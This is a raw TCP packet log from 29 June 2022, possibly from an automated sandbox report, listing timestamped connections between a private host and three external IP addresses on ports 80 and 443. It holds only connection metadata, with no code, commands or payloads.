Jun 29, 2022 23:12:18.171735048 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:18.856163025 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:19.473476887 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:19.473520994 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:19.473599911 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:19.526201963 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:19.526230097 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:19.587585926 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:19.587718010 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:19.592547894 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:20.082686901 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:20.082725048 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.082973003 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.083051920 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:20.085968018 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:20.128515005 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.129678965 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.129707098 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.129755974 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.129765034 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:20.129776001 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.129795074 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:20.129842043 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:20.133806944 CEST	49789	443	192.168.2.3	149.154.167.99
Jun 29, 2022 23:12:20.133842945 CEST	443	49789	149.154.167.99	192.168.2.3
Jun 29, 2022 23:12:20.182857990 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.204858065 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.205007076 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.205418110 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.227125883 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.334595919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.334671021 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.345841885 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368273973 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368314981 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368335962 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368355989 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368360996 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368371964 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368382931 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368398905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368401051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368422031 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368422985 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368441105 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368443966 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368459940 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368464947 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368483067 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368500948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.368500948 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.368544102 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.370860100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.370923042 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.386805058 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:20.392282009 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392329931 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392380953 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392401934 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392404079 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392421961 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392438889 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392445087 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392466068 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392468929 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392493963 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392504930 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392512083 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392529964 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392549992 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392549992 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392571926 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392577887 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392594099 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392596960 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392617941 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392632961 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392652988 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392673016 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392693996 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392695904 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392714024 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392714977 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392736912 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392739058 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392752886 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392760038 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.392781019 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.392796993 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.394432068 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.394469023 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.394483089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.394505978 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.416733980 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416764975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416794062 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416815042 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416835070 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416841984 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.416853905 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416877985 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416881084 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.416899920 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416908979 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.416920900 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416930914 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.416939974 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416961908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.416961908 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.416980982 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.416984081 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417006016 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417006016 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417020082 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417027950 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417042017 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417047977 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417067051 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417067051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417082071 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417087078 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417107105 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417109966 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417125940 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417130947 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417149067 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417150021 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417167902 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417176008 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417196035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417205095 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417220116 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417226076 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417242050 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417252064 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417264938 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417273998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417287111 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417293072 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417309046 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417313099 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417331934 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417334080 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417347908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417355061 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417376041 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417378902 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417388916 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417402029 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417422056 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417423010 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417437077 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417440891 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417464972 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417464972 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417480946 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417484999 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417506933 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.417509079 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417522907 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.417545080 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.418020010 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.418041945 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.418072939 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.418095112 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.418138027 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.418158054 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.418184042 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.418205976 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441354990 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441387892 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441418886 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441485882 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441508055 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441560030 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441603899 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441610098 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441627026 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441651106 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441674948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441710949 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441730022 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441751957 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441757917 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441776037 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441796064 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441808939 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441828012 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441833019 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441855907 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441862106 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441878080 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.441885948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441906929 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.441931009 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442029953 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442050934 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442070007 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442079067 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442092896 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442094088 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442121983 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442130089 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442140102 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442154884 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442178011 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442186117 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442197084 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442226887 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442260981 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442286015 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442310095 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442334890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442342997 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442364931 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442367077 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442389011 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442400932 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442409992 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442420959 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442444086 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442445040 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442466974 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442470074 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442487955 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442495108 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442508936 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442513943 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442538977 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442560911 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442563057 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442593098 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442610979 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442619085 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442632914 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442642927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442663908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442665100 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442678928 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442687035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442706108 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442729950 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442922115 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442941904 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442965031 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.442984104 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.442987919 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443008900 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443018913 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443030119 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443051100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443058014 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443073988 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443080902 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443099022 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443119049 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443119049 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443140030 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443151951 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443161964 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443182945 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443186045 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443205118 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443223953 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443245888 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443857908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443891048 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.443927050 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.443957090 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.444170952 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.444192886 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.444233894 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.444262028 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.444561958 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445105076 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445126057 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445157051 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445172071 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445184946 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445354939 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445372105 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445405006 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445436001 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445683956 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445708036 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445728064 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445735931 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445750952 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445770979 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445777893 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445792913 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445812941 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445818901 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445835114 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445842028 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445858002 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445878983 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445887089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445899963 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445920944 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445925951 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445941925 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445961952 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445964098 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.445983887 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.445997000 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.446005106 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.446024895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.446034908 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.446046114 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.446065903 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.446095943 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.446103096 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.446139097 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466608047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466634035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466650009 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466675997 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466696024 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466713905 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466734886 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466746092 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466751099 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466777086 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466785908 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466793060 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466798067 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466799974 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466823101 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466841936 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466849089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466866016 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466866970 CEST	49792	80	192.168.2.3	159.69.101.170
